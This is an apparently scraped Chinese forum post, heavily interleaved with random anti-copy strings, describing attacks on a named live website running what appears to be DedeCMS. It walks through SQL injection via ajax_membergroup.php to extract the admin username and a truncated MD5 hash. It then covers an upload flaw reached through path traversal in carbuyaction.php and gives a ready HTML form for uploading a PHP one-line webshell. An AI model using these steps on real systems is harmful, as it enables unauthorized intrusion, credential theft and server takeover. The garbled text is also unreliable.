①注入漏洞。
! q( g4 N$ V+ G1 I6 s这站 http://www.political-security.com/
. Q3 q( {8 A" v- h& `/ z首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
0 e8 [5 s! I. n4 ?9 Bwww.political-security.com/data/mysql_error_trace.inc 爆后台
2 v) N1 }/ q# ^, S7 D然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。3 R% L+ K. [5 d2 C, _2 D' v9 X
然后写上语句
3 [5 v/ S: c" X. F查看管理员帐号. x) g% _6 \( |
http://www.political-security.co ... &membergroup=@`9 }1 E6 \- F" B% Y
% v: V, t7 e: {8 u4 w e% N) \
admin
1 v! `7 O& }$ D8 }; X& L: c' r8 }$ U6 T0 w2 Y) h z
查看管理员密码
0 U/ {) b& T, @ http://www.political-security.co ... &membergroup=@`
( G4 Z! q1 E' C* t
! m9 p* C' e8 B' U3 E; h' A8d29b1ef9f8c5a5af4293 C6 {0 {5 N+ Y7 ?! B3 S
9 i( a# w2 [! T
查看管理员密码
: }3 E" N6 U( u/ l
6 z% [6 h3 h% \1 R得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
/ J) n4 m, C& X8 \% C. z+ e
$ @( R: N) I2 c! Y8d2' H! m, J9 P( X" v r' E
9b1ef9f8c5a5af42
0 ?5 x! r1 j7 H. @/ E) ` @+ N96 V$ E5 R" W6 O( _6 f/ Y1 l
0 t& y. z! c( R8 |% e' Y4 n p
cmd5没解出来 只好测试第二个方法
9 C- S$ U1 B) z$ V" |
4 I( a; G0 K- o" |0 Z* S
- z7 L- Z; z1 E) W$ F* |②上传漏洞:8 Y4 }% G& ?5 A/ @6 w
$ q% P% K6 s* k; z+ G, k
只要登陆会员中心,然后访问页面链接
$ p. x0 ?( }. z“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
3 ^6 H0 u( J/ T5 f0 g3 y" u
( j+ V# z* C& O v' ]如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”: ?2 |5 P+ e3 M5 j7 U
0 |. ]! ~ [' w1 W* T
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm5 `; | }! K+ L: u/ G% U6 [ _
$ E/ [; ]6 d) B3 S3 M7 F; ?
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
% b3 v- q" v2 d8 ^$ j" x或者
( G4 Z2 n; r" V0 H5 g/ P- e即可上传成功 |